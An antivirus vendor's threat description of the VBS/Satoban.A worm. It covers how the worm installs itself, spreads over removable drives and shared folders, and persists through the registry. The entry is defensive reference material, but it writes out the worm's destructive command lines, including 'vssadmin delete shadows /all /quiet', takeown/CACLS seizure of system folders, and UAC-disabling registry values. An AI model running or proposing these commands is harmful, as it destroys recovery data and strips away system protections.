VBS/Satoban [Threat Name] go to Threat

VBS/Satoban.A [Threat Variant Name]

Category worm
Size 716 93
Aliases Win32:Agent-AQTU (Avast)
Short description

VBS/Satoban.A is a worm that spreads via shared folders and removable media. The worm tries to download and execute several files from the Internet.

Installation

When executed, the worm creates the following folders:

  • %systemdrive%\­Kernel
  • %systemdrive%\­Kernel\­lpt1
  • %systemdrive%\­security
  • %systemdrive%\­security\­lpt1
  • %systemroot%\­system32\­system
  • %systemroot%\­system32\­system\­msg

The worm copies itself to the following locations:

  • %systemdrive%\­Kernel\­r00t3er
  • %systemdrive%\­security\­blood.dat

The %systemdrive%\Kernel, %systemdrive%\security folder may have the System (S) and Hidden (H) attributes set in attempt to hide the folder in Windows Explorer.


The %systemdrive%\Kernel\r00t3er file(s) may have the System (S) and Hidden (H) attributes present in attempt to hide the file in Windows Explorer.


The worm creates the following files:

  • %allusersprofile%\­rescue.vbe (1890 B, VBS/TrojanDownloader.Psyme.NJJ)
  • %systemroot%\­system32\­system\­svchost.exe (12 B)
  • %systemroot%\­system32\­system\­msg\­config.txt (426 B)
  • %temp%\­tmp.vbe (2178 B, VBS/Satoban.A)
  • %temp%\­b.bat (2086 B, VBS/Satoban.A)
  • %systemdrive%\­security\­system.vbs (123 B, VBS/Satoban.A)

The worm may create copies of the following files (source, destination):

  • %systemroot%\­system32\­wscript.exe, %systemdrive%\­security\­svchost.exe

The worm executes the following commands:

  • sc create system binPath= "%systemroot%\­System32\­system\­svchost.exe msg" start= auto &
  • net start system &
  • sc description system " processus générique de Windows .Si ce service est arrêté,les services qui en dépendent ne pourront pas démarrer et votre systeme risque d'etre endommagé. " &
  • EXIT

In order to be executed on every system start, the worm sets the following Registry entry:

  • [HKEY_LOCAL_MACHINE\­Software\­Microsoft\­Windows\­CurrentVersion\­Policies\­Explorer\­Run]
    • "rescue" = "%allusersprofile%\­rescue.vbe"

The following Registry entries are created:

  • [HKEY_CURRENT_USER\­Software\­Microsoft\­Windows Script Host\­Settings]
    • "Timeout" = 0
  • [HKEY_CURRENT_USER\­SOFTWARE\­Policies\­Microsoft\­Windows\­System]
    • "DisableCMD" = 0
  • [HKEY_CURRENT_USER\­Software\­Microsoft\­Windows\­CurrentVersion\­Policies\­System]
    • "DisableRegistryTools" = 0
    • "DisableTaskMgr" = 0
  • [HKEY_LOCAL_MACHINE\­Software\­Microsoft\­Windows\­CurrentVersion\­Policies\­Explorer\­sdate]
    • "sdate" = "38"
  • [HKEY_CLASSES_ROOT\­Applications\­Notepad2.exe\­Shell\­Open]
    • "command" = "%systemroot%\­System32\­Notepad.exe"
  • [HKEY_CLASSES_ROOT\­Applications\­notepad.exe\­shell\­open]
    • "command" = "%systemroot%\­System32\­Notepad.exe"
  • [HKEY_CLASSES_ROOT\­Batfile\­Shell\­Edit\­Command]
    • "" = "%systemroot%\­System32\­Notepad.exe"
  • [HKEY_CLASSES_ROOT\­VBEFile\­Shell\­Edit\­Command]
    • "" = "%systemroot%\­System32\­Notepad.exe"
  • [HKEY_CURRENT_USER\­Software\­Microsoft\­Windows\­CurrentVersion\­Explorer\­Advanced]
    • "Hidden" = 2
    • "ShowSuperHidden" = 0
  • [HKEY_LOCAL_MACHINE\­SYSTEM\­CurrentControlSet\­Services\­System]
    • "Type" = 16
    • "Start" = 2
    • "ErrorControl" = 1
    • "ImagePath" = "%systemroot%\­­System32\­­system\­­svchost.exe msg"
    • "ObjectName" = "LocalSystem"
    • "Description" = " processus générique de Windows .Si ce service est arrêté,les services qui en dépendent ne pourront pas démarrer et votre systeme risque d'etre endommagé. "

The worm may delete files stored in the following folders:

  • %systemdrive%\­­Kernel
  • %systemdrive%\­­security
Spreading

The worm searches for available local and removable drives. The worm may delete the following files:

  • %drive%\­­*.vbe
  • %drive%\­­*.lnk
  • %drive%\­­config.dat
  • %drive%\­­autorun.inf
  • %drive%\­­microsoft.dat

The worm searches for the following folders:

  • %drive%\­­*.*

The worm creates the following file:

  • %drive%\­­%variable%.lnk

The name of the new file is based on the name of the folder found in the search.


The file is a shortcut to a malicious file.


The worm copies itself to the following location:

  • %drive%\­­config.dat

The %drive%\­config.dat file(s) may have the System (S) and Hidden (H) attributes present in attempt to hide the file in Windows Explorer.

Spreading via shared folders

The worm searches for various shared folders.


The worm may delete the following files:

  • %sharedfolder%\­*.vbe
  • %sharedfolder%\­*.lnk

The worm creates the following files:

  • %sharedfolder%\­Mariage.lnk

The file is a shortcut to a malicious file.


The worm copies itself to the following location:

  • %sharedfolder%\­Update.dat

The %sharedfolder%\Update.dat file(s) may have the System (S) and Hidden (H) attributes present in attempt to hide the file in Windows Explorer.

Other information

The worm may set the following Registry entries:

  • [HKEY_LOCAL_MACHINE\­Software\­Microsoft\­Windows\­CurrentVersion\­Policies\­System]
    • "ConsentPromptBehaviorAdmin" = 0
    • "EnableLua" = 0
  • [HKEY_CURRENT_USER\­VBEFile\­DefaultIcon]
    • "" = "%systemroot%\­system32\­shell32.dll,1"

The worm may delete the following Registry entries:

  • [HKEY_CLASSES_ROOT\­lnkfile]
    • "IsShortCut"

The worm may create the following files:

  • %temp%\­uac.bat (1904 B, VBS/Agent.NCF)
  • %temp%\­ADMIN.vbe (292 B, VBS/AutoRun.HX)
  • %temp%\­CPBA.bat (390 B, VBS/Satoban.A)
  • %temp%\­tp.vbe (175 B, VBS/AutoRun.HX)
  • %temp%\­tmp.bat (1108 B, VBS/Agent.NCF)

The worm may attempt to download files from the Internet. The worm contains a list of 7 URLs. The HTTP protocol is used.


These are stored in the following locations:

  • %systemdrive%\­security\­system.txt
  • %temp%\­booter.dat
  • %systemdrive%\­kernel\­explorer.jpg
  • %systemdrive%\­kernel\­update.txt

The worm moves the following files (source, destination):

  • %systemdrive%\­security\­system.txt, %systemdrive%\­security\­system.vbe
  • %temp%\­booter.dat, %temp%\­reskp.exe
  • %systemdrive%\­security\­system.txt, %systemdrive%\­security\­system.bat
  • %systemdrive%\­security\­system.txt, %systemdrive%\­security\­system.exe
  • %systemdrive%\­kernel\­explorer.jpg, %systemdrive%\­kernel\­explorer.exe
  • %systemdrive%\­kernel\­update.txt, %systemdrive%\­kernel\­Update.exe
  • %systemroot%\­system32\­drivers\­flpydisk.sys, %systemroot%\­system32\­drivers\­flpydisk.sy_

The worm creates copies of the following files (source, destination):

  • %systemdrive%\­kernel\­*.vbe, %temp%
  • %scriptpath%, %temp%

The following files are deleted:

  • %systemdrive%\­*.lnk
  • %systemdrive%\­autorun.inf
  • %temp%\­%scriptfile%

The worm may execute the following commands:

  • cmd /K takeown /F %systemdrive%\­kernel /A /R /D O &
  • CACLS %systemdrive%\­Kernel /E /T /C /G %username%:F &
  • takeown /F %systemdrive%\­security /A /R /D O &
  • CACLS %systemdrive%\­security /E /T /C /G %username%:F &
  • takeown /F "%allusersprofile%\­" /A /R /D O &
  • takeown /a /f %systemroot%\­System32\­wscript.exe &
  • ICACLS %systemroot%\­System32\­wscript.exe /Grant %username%:F &
  • takeown /F "%systemroot%\­system32\­drivers" /A /R /D O &
  • takeown /a /f %systemroot%\­System32\­drivers\­flpydisk.sys &
  • ICACLS %systemroot%\­System32\­drivers\­flpydisk.sys /Grant %username%:F &
  • takeown /F "%systemdrive%\­system Volume Information" /A /R /D O &
  • CACLS "%systemdrive%\­system Volume Information" /E /T /C /G %username%:F &
  • EXIT
  • sc config TermService start= auto > nul
  • svchost.exe /e:VBScript.Encode %systemdrive%\­security\­blood.dat
  • cmd /K vssadmin delete shadows /all /quiet & cd/d "%systemdrive%\­system volume Information" &
  • del/f/s/q/a "%systemdrive%\­system volume Information\­*.*" &
  • EXIT
  • cmd /K md %systemroot%\­system32\­system &
  • md %systemroot%\­system32\­system\­msg &
  • EXIT
  • cmd /u /K ( @echo DisplayName=msg&@echo Description=Description&
  • @echo ServiceType=272&
  • echo WaitActive=0&
  • @echo StartType=2&
  • @echo ErrorControl=1&
  • @echo Source=%systemdrive%\­security\­system.vbs&
  • @echo ResetPeriod=0&
  • @echo RebootMsg=&
  • @echo Command=&
  • @echo nActions=0&
  • @ echo Actions=&
  • @echo StartAtTime=OneTime) > %systemroot%\­system32\­system\­msg\­config.txt &
  • EXIT
  • cmd /K cd/d %systemroot%\­system32\­drivers &
  • ren flpydisk.sys flpydisk.sy_ &
  • del/f/q/s %systemdrive%\­security\­system.bat &
  • del/f/q/s %systemdrive%\­security\­system.exe &
  • del/f/q/s %systemdrive%\­kernel\­explorer.exe &
  • del/f/q/s %systemdrive%\­kernel\­update.exe &
  • del/f/q/s ""%temp%\­reskp.exe"" &
  • rd/q/s %systemdrive%\­system32 &
  • rd/q/s %systemdrive%\­system &
  • EXIT
  • cmd /K del/f/q/A "%systemdrive%\­security\­*.dat" &
  • xcopy /C /H /Y /R "%drive%\­config.dat" "%systemdrive%\­security" &
  • attrib -s -h "%systemdrive%\­security\­*.*" &
  • ren "%systemdrive%\­security\­*.*" blood.dat &
  • EXIT
  • cmd /K del/f/q/A "%systemdrive%\­kernel\­*.dat" &
  • xcopy /C /H /Y /R "%drive%\­config.dat" "%systemdrive%\­kernel" &
  • attrib -s -h "%systemdrive%\­kernel\­*.*" &
  • ren "%systemdrive%\­kernel\­*.*" r00t3r &
  • attrib +s +h "%systemdrive%\­kernel\­*.*" &
  • EXIT
  • cmd /K cd/d "%systemdrive%\­security" &
  • copy /b /y blood.dat + &
  • EXIT

The worm removes system restore points.


It contains the following strings:

  • '========================================================================================='
  • '
  • ' C0d3 N4me : S4T4n
  • ' Cr34t0r : R4PTOR
  • ' Created for personal use , modifications or others are not authorized
  • ' For more informations, looking 4 me { - CNG4L on Race }
  • '
  • '========================================================================================='

Please enable Javascript to ensure correct displaying of this content and refresh this page.